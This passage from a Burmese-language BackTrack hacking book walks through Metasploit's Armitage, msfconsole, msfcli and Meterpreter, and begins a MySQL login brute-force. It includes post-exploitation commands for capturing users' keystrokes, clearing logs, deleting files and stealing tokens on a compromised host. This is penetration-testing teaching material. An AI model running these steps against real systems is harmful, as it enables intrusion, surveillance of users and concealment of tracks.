ကာ System ကို စတင္ျခင္းျဖင့္ နိဂံုးခ်ဳပ္ခဲ့ပါသည္။

Mastering Armitage – the graphical mana-


gement tool for Metasloit
Metsploit ၏ Version အသစ္သည္ Armitage ဟုေခၚတြင္ေသာ Graphical အေျချပဳ Tool တစ္ခုျဖစ္လာ
ပါသည္။ Metasploit ကို ပိုမိုလြယ္ကူစြာျဖင့္ မ်က္ျမင္အသံုးျပဳႏိုင္ေသာေၾကာင့္ Armitage ကို နားလည္
ေစရန္ အေရးႀကီးလာပါသည္။ ၄င္းသည္ Metasploit console ႏွင့္အက်ံဳး၀င္ေစၿပီး လုပ္ေဆာင္ျခင္းကို
ေရတြက္ျခင္းအားျဖင့္ေသာ္လည္းေကာင္း တစ္ခ်ိန္တည္းတြင္ Meterpreter Session တစ္ခု သို႕မဟုတ္
Metasploit console တစ္ခုထက္ပိုမို အသံုးျပဳႏိုင္ေသာအခ်က္မ်ားသည္ Metasploit ကိုအသံုးျပဳျခင္းထက္
ပိုမိုေကာင္းမြန္ေစေသာအခ်က္မ်ားျဖစ္လာပါသည္။

ယခုအပိုင္းကိုအသံုးျပဳႏိုင္ရန္အတြက္ Internet သို႕မဟုတ္ Intranet Connection ကိုလို္အပ္ပါမည္။

ယခုအပိုင္းတြင္ Armitage ၏ အသြင္အျပင္ၾကည္႕ရွဳၾကည္႕ျခင္းျဖင့္ စတင္ၾကပါမည္။

၁။ Desktop မွ Applications> BackTrack> Exploitation Tools> Network Exploitation Tools>


Metasploit Framework> Armitage ဟုအဆင့္ဆင့္ေရြးခ်ယ္ျခင္းျဖင့္ Armitage ကိုစတင္ရပါမည္။

၂။ Armitage Login Screen မွ Connect ခလုတ္ကို Click ႏိွပ္ပါ။

138 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ အခ်ိန္အနည္းငယ္အတြင္းတြင္ Armitage သည္ Metasploit ႏွင့္ခ်ိတ္ဆက္ေပးမည္ျဖစ္သည္။


အခ်ိန္အနည္းငယ္ၾကာျမင့္ေသာအခါတြင္ ေအာက္တြင္ေဖာ္ျပထားေသာ Notification Window ကို ေတြ႕
ျမင္ရပါမည္။ စိုးရိမ္စရာမလိုပါ။ မည္သို႕ျဖစ္ေစ Armitage ကို ခ်ိတ္ဆက္မည္ျဖစ္ပါသည္။ ထိ႕ု ေၾကာင့္ Start
Metaspoit? ဟူေသာ Prompt တြင္ Yes ကိုသာ Click ႏိွပ္ျခင္းျဖင့္ အေျဖေပးရပါမည္။

၄။ ထိုအခါ Armitage Main Screen ကိုေတြ႕ျမင္ရပါမည္။ ယခုအေျခအေနတြင္ Main Screen ေပၚမွ


ေအာက္တြင္ေဖာ္ျပထားေသာ Region သံုးခုအေၾကာင္းကို ေဆြးေႏြးၾကည္႕ပါမည္။ (ထို Region သံုးခုကို A,
B, C ဟုအမည္တပ္၍ ပံုႏွင့္တကြေဖာ္ျပထားပါသည္။

 A: ယခု Region သည္ Preconfigure ျပဳလုပ္ထားေသာ Module မ်ားကိုေဖာ္ျပမည္ျဖစ္သည္။


ေအာက္တြင္ေဖာ္ျပထားေသာ Modules list မွ Space ကိုအသံုးျပဳ၍ Module မ်ားကို ရွာေဖြႏိုင္ပါ
သည္။
 B: ယခု Region သည္ Exploit မ်ားကို ေမာင္းႏွင္ရန္အတြက္ Active ျဖစ္ေနေသာ Target မ်ားကို
ေဖာ္ျပေပးပါသည္။

မ်က္ပြင့္စာေပ 139
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 C: ယခု Region သည္ ေမာင္းႏွင္ရန္နွင့္ ခ်က္ခ်င္းေဖာ္ျပေပးႏိုင္ရန္ Multi Metepreter သို႕


Console Session မ်ားကို ခြင့္ျပဳျခင္းျဖင့္ Multiple Metasploit Tab မ်ားကိုေဖာ္ျပေပးႏိုင္ပါသည္။

မွတ္ရန္။ ။ Terminal Window ေပၚတြင္ ေအာက္တြင္ေဖာ္ျပထားေသာ Command ကိုအသံုးျပဳ၍


လည္း Armitage ကို စတင္ေပးႏိုင္ပါသည္။

armitage

Meterpreter အေၾကာင္းကို ပိုမိုသိရိွႏိုင္ရန္အတြက္ ယခုအခန္းတြင္ပါရိွေသာ Mastering Meterpreter


အပိုင္းတြင္ ေလ့လာႏိုင္ပါသည္။



140 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Mastering the Metasploite Console


(MSFCONSOLE)
ယခုအပိုင္းတြင္ Metasploit Console (MSFCONSOLE) ကိုအသံုးျပဳျခင္းကို ရွင္းျပေပးပါမည္။ ထို
MSFCONSOLE ကိုအဓိကအားျဖင့္ Metasploit database ကို စီမံခန္႕ခြဲရန္၊ Sesssion မ်ားကို ခန္႕ခြဲရန္ႏွင့္
Metasloit module မ်ာကို Configure ႏွင့္ Launch ျပဳလုပ္ရန္ အသံုးျပဳေလ့ရိွပါသည္။ အေျခခံအားျဖင့္
Exloit ကိုအသံုးျပဳရျခင္း၏ ရည္ရြယ္ခ်က္အတြက္ MSFCONSOLE သည္ Host တစ္ခုႏွင့္ ခ်ိတ္ဆက္မည္
ျဖစ္ၿပီး ထို ခ်ိတ္ဆက္မႈမွတစ္ဆင့္ Exploit ကိုအသံုးျပဳရမည္ျဖစ္ပါသည္။

Console ကိုအသံုးျပဳ၍ အသံုးျပဳႏိုင္ေသာ Common Command အခ်ိဳ႕မွာ ေအာက္ပါအတိုင္းျဖစ္သည္။

 help : ထို Command ကို Help ဖိုင္ၾကည္႕ရွဳရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။


 use modulename : ထို Command သည္ ေရြးခ်ယ္လိုက္ေသာ Moudle ကို Configure
ျပဳလုပ္ႏိုင္ရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။
 set optionname modulename : ထို Command သည္ ေပးထားေသာ module တြင္
အမ်ိဳးမ်ိဳးေသာ option မ်ားကို သတ္မွတ္ရန္အတြက္ အသံုးျပဳရပါသည္။
 exploit : exploit module ကို Launch ျပဳလုပ္ရန္အတြက္ ယခု Command ကိုအသံုးျပဳ
ႏိုင္ပါသည္။
 Run : ယခု Command ကို Non-Exploit module အတြက္ အသံုးျပဳရပါမည္။
 Search modulename : Individual module ကိုရွာေဖြရန္အတြက္ ယခု Command ကို
အသံုးျပဳႏိုင္ပါသည္။
 exit : MSFCONSOLE မွ ထြက္ရန္အတြက္ ယခု Command ကိုအသံုးျပဳႏိုင္ပါသည္။

ယခုအပိုင္းကို စတင္လုပ္ေဆာင္ရန္အတြက္ Internet သိ႕ု မဟုတ္ Internal Network ကိုအသံုးျပဳရပါမည္။

၁။ Command Prompt ကိုဖြင့္ပါ။

၂။ MSFCONSOLE ကိုဖြင့္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

မ်က္ပြင့္စာေပ 141
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

msfconsole

၃။ Search Command ကိုအသံုးျပဳျခင္းျဖင့္ အသံုးျပဳႏိုင္ေသာ Linux Module မ်ားကို ရွာေဖြႏိုင္ပါသည္။


၄င္းသည္ အျမဲတမ္းလိုလိုပင္ ထိုးေဖာက္မႈတစ္ခုကို ျပဳလုပ္သည္႕အခ်ိန္တိုင္းတြင္ Module ကိုရွာေဖြရန္
အတြက္ အႀကံဥာဏ္ေကာင္းတစ္ခုျဖစ္ပါသည္။ ထိုသို႕ျပဳလုပ္ရျခင္း၏ အဓိကအခ်က္မွာ Metasploit ၏
မ်ားျပားေသာ Version မ်ားအၾကား Module ၏လမ္းေၾကာင္းသည္ ေျပာင္းလဲေကာင္း ေျပာင္းလဲၿပီး ျဖစ္ေစ
မည္႕အတြက္ေၾကာင့္ ျဖစ္ပါသည္။

search linux

၄။ John the Ripper Linux Password Cracker Module ကိုအသံုးျပဳပါမည္။

use /auxiliary/analyze/jtr_linux

၅။ module ၏ အသံုးျပဳႏိုင္မည္႕ Option မ်ားကိုၾကည္႔ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

show options

142 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ ထိုအခါ Option စာရင္းကိုရရိွၿပီးျဖစ္သည္႕အတြက္ Module ကိုစတင္အသံုးျပဳႏိုင္ၿပီျဖစ္သည္။


ထို႕ေၾကာင့္ set Command ကို အသံုးျပဳၿပီး Individual Option မ်ားကို သတ္မွတ္ေပးႏိုင္ပါသည္။
ထို႕ေနာက္ JOHN_PATH option ကိုသတ္မွတ္ေပးရပါမည္။

set JOHN_PATH /pentest/passwords/john

၇။ Exploit ကို ေမာင္းႏွင္ေပးရပါမည္။ ထို႕ေၾကာင့္ exploit command ကိုအသံုးျပဳပါ။

exploit

MSFCONSOLE ကိုအသံုးျပဳ၍ Host သိ႕ု ၀င္ေရာက္ၿပီးေသာအခါတြင္ payload မ်ားကို ျဖန္႕ေ၀ရန္အတြက္


Metepreter ကိုအသံုးျပဳရပါမည္။ MSFCONSOLE သည္ Sessions မ်ားကို Manage ျပဳလုပ္ေသာ္လည္း
Meterpreter သည္ စစ္မွန္ေသာ payload ႏွင့္ exploit engagement မ်ားကို ျပဳလုပ္ေပးပါသည္။



မ်က္ပြင့္စာေပ 143
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Mastering the Metasloit CLI (MSFCLI)


ယခုအပိုင္းတြင္ Metasploit CLI (MSFCI) ကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ Metasploit သည္ ၄င္း၏
အလုပ္မ်ားကို ေဆာင္ရြက္ ရန္အတြက္ Interface တစ္ခုကိုအသံုးျပဳေပးလိုအပ္ပါမည္။ MSFCLI သည္
ထိုကဲ့သို႕ေသာ Interface တစ္ခုလည္းျဖစ္ပါသည္။ ထို႕ေၾကာင့္ ၄င္းသည္ Exploit အသစ္တစ္ခုကို
ေရးသား၊ စမ္းသပ္ရန္ သို႕မဟုတ္ Metasploit ကိုသင္ၾကားရန္ အေကာင္းဆံုးေသာ Interface တစ္ခုလည္း
ျဖစ္ပါသည္။ ၄င္းသည္ Script မ်ားကို အသံုးျပဳျခင္း ႏွင့္ Task မ်ားအတြက္ Basic automation ကို apply
ျပဳလုပ္ျခင္းကိုလည္း Serve လုပ္ေပးႏိုင္ပါသည္။

MSFCLI ကိုအသံုးျပဳျခင္းျဖင့္ သတိထားရမည္႕အခ်က္တစ္ခုမွာ တစ္ခ်ိန္တြင္ Shell တစ္ခုကိုသာ ဖြင့္ႏိုင္


သည္ ဆိုေသာအခ်က္ပင္ျဖစ္သည္။ ေနာက္ထပ္သတိျပဳရမည္႕အခ်က္တစ္ခုမွာ Command အခ်ိဳ႕ျဖင့္
MSFCLI ကိုအသံုးျပဳေသာအခါ ၄င္း၏ Function မ်ားသည္အနည္းငယ္ခန္႕ေႏွးေကြးၿပီး အနည္းငယ္လည္း
MSFCONSOLE ကိုအသံုးျပဳျခင္းထက္ပိုမိုရႈ႔ပ္ေထြးတတ္ပါသည္။ ေနာက္ဆံုးအေနျဖင့္ MSFCLI ကိုအသံုးျပဳ
ရန္အတြက္ Exploit ကို Exact ျပဳလုပ္ရမည္႕အခ်က္မ်ားကို သိရိွထားရပါမည္။ ထိုသ႕ို ျပဳလုပ္ျခင္းသည္
Metasploit ၏ Exploit မ်ားကိုအသံုးမျပဳဖူးသူ လူသစ္တန္းအတြက္ အနည္းငယ္အခက္အခဲရိွႏိုင္ပါသည္။

MSFCI ကိုအသံုးျပဳႏိုင္ေသာ Command အခ်ိဳ႕မွာ

 msfcli : ၄င္းသည္ MSFCLI မွလက္ခံႏိုင္ေသာ exploit မ်ား၏ list ကိုေဖာ္ျပေပးပါသည္။


 msfcli –h : MSFCLI ၏ help ဖိုင္ကို ေဖာ္ျပေပးမည္ျဖစ္သည္။
 /opt/metasploit/msf3/msfcli [PATH TO EXPLOIT] [options= value] : ၄င္းသည္
Exploit တစ္ခုကို အသံုးျပဳရန္အတြက္ ပံုစံကိုေဖာ္ျပထားျခင္းျဖစ္သည္။

ယခုအပိုင္းကို လုပ္ေဆာင္ရန္အတြက္ Internet သို႕မဟုတ္ internal network ကိုအသံုးျပဳရပါမည္။

MSFCLI ၏ Exploration ကိုစတင္ၾကည္႕ၾကပါမည္။

144 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁။ MSFCLI ကိုစတင္ပါမည္။ အသံုးျပဳထားေသာ Computer ၏ အျမန္ႏႈန္းအေပၚမူတည္၍ အခ်ိန္အနည္း


ငယ္ၾကာျမင့္ႏိုင္ေသာေၾကာင့္ သည္းခံေစာင့္ဆိုင္းေပးရန္လိုအပ္ပါမည္။ MSFCLI ကို Load လုပ္ယူၿပီးေသာ
အခါတြင္ အသံုးျပဳႏိုင္ေသာ exploit မ်ား၏ စာရင္းကို ေဖာ္ျပေပးပါမည္။

msfcli

၂။ ေအာက္ပါ Command ကိုအသံုးျပဳျခင္းျဖင့္ MSFCLI Help ဖိင


ု ္ကို ေတြ႕ျမင္ရပါမည္။

msfcli –h

၃။ ေဖာ္ျပခ်က္အတြက္ Christmas Tree Scan တစ္ခုကို လုပ္ေဆာင္ရပါမည္။ Module ၏ အဆင့္ျမင့္


Option မ်ားကို ေတြ႕ျမင္ႏိုင္ရန္အတြက္ Option A ကို ေရြးခ်ယ္ရပါမည္။ ထို႕ေၾကာင့္ ေအာက္ပါ Command
ကို အသံုးျပဳရပါမည္။

/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas A

မ်က္ပြင့္စာေပ 145
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ ျဖည္႕စြက္ခ်က္အရ S mode ကိုအသံုးျပဳျခင္းျဖင့္ လက္ရိွအသံုးျပဳေနေသာ Module ၏ Summary ကို


List ျပဳလုပ္ႏိုင္ပါသည္။ Summary Mode သည္ ေမာင္းႏွင္ရန္ႀကိဳးပမ္းေနေသာ Exploit အတြက္
အသံုးျပဳႏိုင္ေသာ Option အားလံုးကို ေတြ႕ျမင္ႏိုင္သည္႕အတြက္ ေကာင္းမြန္သည္႕ နည္းလမ္းဟု ဆိုႏိုင္
ပါသည္။ Option အမ်ားစုသည္ မလုပ္မေနရျဖစ္ေသာ္လည္း အခ်ိဳ႕ေသာအနည္းစု Option မ်ားကိုအသံုးျပဳ
ေပးရန္ လိုအပ္ပါသည္။ ထိုသို႕လုပ္ေဆာင္ျခင္းျဖင့္ Exploit ေမာင္းႏွင္ရန္ႀကိဳးပမ္းေနေသာ Target သို႕မ
ဟုတ္ Target ကို သတ္မွတ္ရန္ ခြင့္ျပဳေပးပါသည္။

/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas S

146 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ အသံုးျပဳမည္႕ Exploit တြင္ အသံုးျပဳႏိုင္ေသာ Option မ်ားကိုၾကည္႕၍ရန္အတြက္ O mode ကိုအသံုးျပဳ


ရပါမည္။ Option မ်ားသည္ Exploit Module ကို Configure ျပဳလုပ္ရန္နည္းလမ္းတစ္ခုလည္းျဖစ္ပါသည္။
Exploit Module တစ္ခုစီတြင္ ကြျဲ ပားျခားနားေသာ Option မ်ားရိွပါသည္။ (လံုး၀မရိွဘဲလည္း ရိွႏိုင္ပါသည္)
လိုအပ္ေသာ Option အားလံုးကို Exploit ကုိစတင္အသံုးမျပဳမီတြင္ သတ္မွတ္ေပးရပါမည္။ မ်ားစြာေသာ
လိုအပ္သည္႕ Option အမ်ားစုကို မျပင္ဆင္ပဲ နဂိုအတိုင္းသာထားရသည္ကို သတိျပဳပါ။ အထက္ပါ
အေၾကာင္းအရာမ်ားအရ အကယ္၍ ေျပာင္းလဲရန္မလိုအပ္လွ်င္္ Option တန္ဖိုး (Value) မ်ားကို Update
မျပဳလုပ္ရပါ။

/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas O

၆။ Exploit ကို အသံုးျပဳရန္အတြက္ E mode ကိုအသံုးျပဳရပါမည္။

/opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas E

ယခုအပိုင္းတြင္ MSFCLI ကို launching ျပဳလုပ္ျခင္းျဖင့္ စတင္ခဲ့ၿပီး အသံုးျပဳမည္႕ Module ကိုရွာေဖြကာ


module ကို Execute ျပဳလုပ္ရန္အခ်က္မ်ားကိုေဖာ္ျပခဲ့ပါသည္။ ထိုသို႕ရွာေဖြျခင္းတြင္ Christmas Treee
Scan Module ကိုေရြးခ်ယ္ခဲ့ၿပီး Module ၏ Summary ႏွင့္ အသံုးျပဳႏိုင္ေသာ Option မ်ားကို ၾကည္႕ရန္အ
တြက္ MSFCLI Interface ကို Review ျပဳလုပ္ခဲ့ၾကပါမည္။ Option အားလံုးကို သတ္မွတ္ၿပီးေသာအခါ
Exploit ကုိ ေမာင္းႏွင္ျခင္းကို ေဖာ္ျပခဲ့ပါသည္။

Metasploit Framework ကို သံုးပိုင္းခြျဲ ခားထားျခင္းကို သိရိွႏိုင္ရန္အေရးႀကီးသည္႕အတြက္ ထိုအပိုင္း


သံုးပိုင္းအေၾကာင္းကို ေအာက္တြင္ေဖာ္ျပေပးပါသည္။

 Vulnerabilities : ၄င္းတို႕သည္ အားနည္းခ်က္မ်ားျဖစ္ပါသည္။ သိထားၿပီးသားမ်ား


ပါ၀င္သကဲ့သို႕ မသိေသးေသာ အခ်က္မ်ားလည္း ပါ၀င္ႏိုင္ပါသည္။ ၄င္းတို႕သည္
မ်က္ပြင့္စာေပ 147
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Application မ်ား၊ Software Package မ်ား၊ သို႕မဟုတ္ Protocol မ်ား၏ အားနည္းခ်က္


မ်ားေၾကာင့္ ေပၚထြက္လာျခင္းျဖစ္သည္။ Metasploit တြင္ ထို Vulnerabilities (အားနည္း
ခ်က္ယိုေပါက္)မ်ားကို တူရာစု၍ Group ေပါင္းေဖာ္ျပထားၿပီး ထို List မွ Vulnerability ကုိ
မွီခို၍ ထိုးေဖာက္ရန္အတြက္ အသံုးျပဳရမည္႕ Exploit အမ်ိဳးမ်ိဳးတို႕ကိုလည္း ေဖာ္ျပထားပါ
သည္။
 Exploits : Vulnerabilities (အားနည္းခ်က္၊ ယိုေပါက္မ်ား) ေပၚတြင္ အခြင့္အေရးယူ၍
ထိုးေဖာက္၀င္ေရာက္ေစႏိုင္ေသာ Module မ်ားကို Exploit မ်ားဟုေခၚသည္။
 Payloads : Exploit တစ္ခုကို ေအာင္ျမင္စြာ ေမာင္းႏွင္ၿပီးေသာအခါတြင္ Payload
တစ္ခုကို တိုက္ခိုက္ခံရေသာ Machine သို႕ Shell မ်ားျပဳလုပ္ရန္၊ အမ်ိဳးမ်ိဳးေသာ
Command မ်ားကို ေမာင္းႏွင္ရန္၊ User မ်ားထည္႕သြင္းျခင္းႏွင့္ အျခားေသာလုပ္ေဆာင္
ခ်က္မ်ားစြာတို႕အတြက္ ျဖန္႕ေ၀ရပါမည္။

MSFCLI သို႕မဟုတ္ MSCONSOLE ကိုအသံုးျပဳ၍ Host သိ႕ု ၀င္ေရာက္ၿပီးသြားေသာအခါတြင္ payload


မ်ားကို ျဖန္႕ေ၀ရန္အတြက္ Meterpreter ကိုအသံုးျပဳရပါမည္။ MSFCONSOLE သည္ Session မ်ားကို
Manages ျပဳလုပ္ေပးေသာ္လည္း Meterpreter သည္ လက္ရိွ Payload ႏွင့္ Exploit engagement မ်ားကို
သာ ျပဳလုပ္ေပးမည္ျဖစ္သည္။

မွတ္ရန္။ ။ Meterpreter ကို ထပ္မံေလ့လာလိုပါက ယခုအခန္းတြင္ေဖာ္ျပထားေသာ Mastering


Meterpreter အပိုင္းတြင္ဖတ္ရွဳေလ့လာႏိုင္ပါသည္။

Mastering Metepreter
Armitage, MSFCLI သိ႕ု မဟုတ္ MSFCONSOLE တစ္ခုခုကိုအသံုးျပဳၿပီး Host ကို ၀င္ေရာက္ထားၿပီးသည္႕
အခါတြင္ Payload မ်ားကို ျဖန္႕ေ၀ရန္ (Deliver) အတြက္ Meterpreter ကိုအသံုးျပဳရပါမည္။ Meterpreter
မွ လက္ရိွ Payload ႏွင့္ Exloit engagement မ်ားျပဳလုပ္ေနစဥ္တြင္ MSFCONSOLE ကို Session မ်ားကို
Manage ျပဳလုပ္ရန္ အသံုးျပဳရပါမည္။

Meterpreter တြင္ ပါ၀င္ေသာ အသံုးတည္႕ Command အခ်ိဳ႕ကိုေအာက္တြင္ေဖာ္ျပထားပါသည္။

148 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 help : ယခု Command ျဖင့္ Help ဖိုင္ကို ၾကည္႕ရွဳရန္အသံုးျပဳႏိုင္ပါသည္။


 backgroud : ေနာက္ကြယ္တြင္ Run ေနေသာ Meterpreter Session တစ္ခုကို
ထိန္းသိမ္းရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။ ထို Command ကို MSF Prompt မွ
လုပ္ေဆာင္ရပါမည္။
 download : ထို Command ကိုအသံုးျပဳျခင္းျဖင့္ ၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာမွ
ဖိုင္တစ္ဖိုင္ကုိ ရယူ (Download)ေစႏိုင္ပါသည္။
 upload : ယခု Command ျဖင့္ ၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာသို႕ ဖိုင္တစ္ဖိုင္ကို
ပို႕လႊတ္ (upload) ျပဳလုပ္ႏိုင္ပါသည္။
 execute : ၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာတြင္ Command တစ္ခုကို Run ေပးေစရန္
အတြက္ ယခု Command ကိုအသံုးျပဳရပါမည္။
 shell : ၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာ၏ Windows Shell Prompt တစ္ခုကို ေမာင္းႏွင္
ရန္အတြက္ ယခု Command ကိုအသံုးျပဳႏိုင္ပါသည္။ (၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာ
သည္ Window စနစ္ကို အသံုးျပဳထားေသာ ကြန္ပ်ဴတာ ျဖစ္ရပါမည္။)
 session –i : Session မ်ားအၾကား ကူးေျပာင္းႏိုင္ရန္အတြက္ ယခု Command သည္
အလြန္အသံုးတည္႕ေစပါမည္။

ယခုအပိုင္းကို လုပ္ေဆာင္ႏိုင္ေစရန္အတြက္

 Internet သိ႕ု မဟုတ္ intranet Connection တစ္ခုကိုလုိအပ္ပါမည္။


 Armitage, MSFCLI သိ႕ု မဟုတ္ MSFCONSOLE စသည္ျဖင့္ တစ္ခုခုကို အသံုးျပဳ၍
Metasploit ျဖင့္ ဖန္တီးတည္ေဆာက္ထားေသာ Target System ၏ Active Session
တစ္ခုကို ျပဳလုပ္ထားရပါမည္။

ယခုအပိုင္းကို စတင္ျပဳလုပ္ရန္အတြက္ MSFCONSOLE ကိုဖြင့္ေပးရပါမည္။

၁။ MSFCONSOLE မွ ေဖာ္ျပထားၿပီးျဖစ္ေသာ Active Session တစ္ခုျဖင့္ ေရွးဦးစြာ စတင္ရပါမည္။

၂။ Exploit ျဖင့္ တိုက္ခိုက္ထားေသာ System ၏ User မ်ားမွ ရိုက္ႏိွပ္ေသာ Keystroke မ်ားကို စတင္
ဖမ္းယူၾကည္႕ပါမည္။

မ်က္ပြင့္စာေပ 149
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

keyscan_start

၃။ Exploit ျဖင့္တိုက္ခိုက္ထားေသာ System ၏ User မ်ားမွ ရိုက္ႏိွပ္ထားေသာ Keystroke မ်ားကို Dump


ျပဳလုပ္ရပါမည္။ ထိုသို႕လုပ္ေဆာင္ျခင္းျဖင့္ Screen ေပၚတြင္ ထို User မ်ားရိုက္ထားေသာ စာသားမ်ားကုိ
ေတြ႕ရိွရပါမည္။

keyscan_dump

၄။ ထိုသို႕ ရိုက္ႏိွပ္ထားေသာ စာသားမ်ားကို ဖမ္းယူျခင္းမွ ရပ္တန္႕ရန္ ေအာက္ပါ Command ကိုအသံုးျပဳ


ပါ။

keyscan_stop

၅။ ၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာမွ ဖိုင္တစ္ဖိုင္ကိုဖ်က္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳပါ။


del exploited.docx

၆။ ၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာမွ Event Log မ်ားကို ရွင္းလင္းပယ္ဖ်က္ရန္အတြက္ ေအာက္ပါ အတိုင္း


အသံုးျပဳပါ။

clearav

၇။ Run ေနေသာ Process မ်ား၏ List ကို ၾကည္႕ရွဳရန္အတြက္

ps

၈။ ၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာမွ Process တစ္ခုကို Kill ျပဳလုပ္ရန္အတြက္ Kill [pid] Command ကို
သံုးစြႏ
ဲ ိုင္ပါသည္။ ေအာက္တြင္ ဥပမာကိုေဖာ္ျပထားပါသည္။ ေလ့လာၾကည္႕ပါရန္

kill 6353

၉။ ၀င္ေရာက္ထားေသာ ကြန္ပ်ဴတာမွ တိုကင္အတုတစ္ခုကို ခိုးယူရန္အတြက္

steal_token

150 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ယခုအပိုင္းတြင္ Armitage၊ MSFCONSOLE သို႕မဟုတ္ MSFCLI တစ္ခုခုကိုအသံုးျပဳ၍ Meterpreter


Session ကို establish လုပ္ေဆာင္ၿပီးေသာ အခ်က္ႏွင့္ စတင္ခဲ့ပါသည္။ ေနာက္ပိုင္းတြင္ ၀င္ေရာက္ထား
ေသာ ကြန္ပ်ဴတာတြင္ အမ်ိဳးမ်ိဳးေသာ Command မ်ားေမာင္းႏွင္အသံုးျပဳပံုကုိ ေဖာ္ျပေပးထားပါသည္။

Linux အေျချပဳ Host ေပၚတြင္ Meterpreter ကိုအသံုးျပဳေသာအခါ Target ကြန္ပ်ဴတာတြင္ အသံုးျပဳရန္


Linux Command မ်ားကိုသာအသံုးျပဳရပါမည္။

Metasploitable MYSQL
ယခုအပိုင္းတြင္ MySQL Scanner module ကိုအသံုးျပဳျခင္းျဖင့္ MySQL database server ကို Attack
ျပဳလုပ္ရန္အတြက္ Metasploit အသံုးျပဳပံုကို ေလ့လာၾကည္႕ၾကပါမည္။ Drupal ႏွင့္ Wordpress အပါအ၀င္
မ်ားစြာေသာ Website Platform မ်ားတြင္ MySQL database server ကိုလက္ရိွအသံုးျပဳလ်က္ရိွပါသည္။
ထိုအခ်က္သည္ Metasploitable MyQL Attack ျပဳလုပ္ရန္အတြက္ လြယ္ကူေသာ Target မ်ားျဖစ္လာပါ
သည္။

ယခုအပိုိင္းကိုအသံုးျပဳႏိုင္ရန္အတြက္ ေအာက္ပါအခ်က္အလက္မ်ားႏွင့္ ျပည္႕စံုရပါမည္။

 Internal Network Connection


 လက္ရိွ Hacking ျပဳလုပ္ေနေသာ (တိုက္ခိုက္ခံေနရေသာ ကြန္ပ်ဴတာမဟုတ္ပါ) ကြန္ပ်ဴ
တာတြင္ Metasploit ေမာင္းႏွင္ထားရန္
 Dictionary Attack ျပဳလုပ္ရန္အတြက္ Word List စသည္တို႕လိုအပ္ပါသည္။

MySQL Attack ျပဳလုပ္ရန္ Terminal Window တြင္အသံုးျပဳရပါမည္။

မ်က္ပြင့္စာေပ 151
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁။ Terminal Window ကိုဖြင့္ပါ။

၂။ MSFCONSOLE ကို Launch လုပ္ရန္ေအာက္ပါ Command ကိုအသံုးျပဳပါ။

msfconsole

၃။ ျဖစ္ႏိုင္ဖြယ္ရာ MySQL module မ်ားကိုရွာေဖြရပါမည္။

search mysql

၄။ MySQL Login Utility ကိုအသံုးျပဳရန္အတြက္

use auxiliary/scanner/mysql/mysql_login

၅။ Module ၏ ျဖစ္ႏိုင္ဖြယ္ရာ Option မ်ားကို ျမင္ေတြ႕ႏိုင္ရန္

show options

152 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

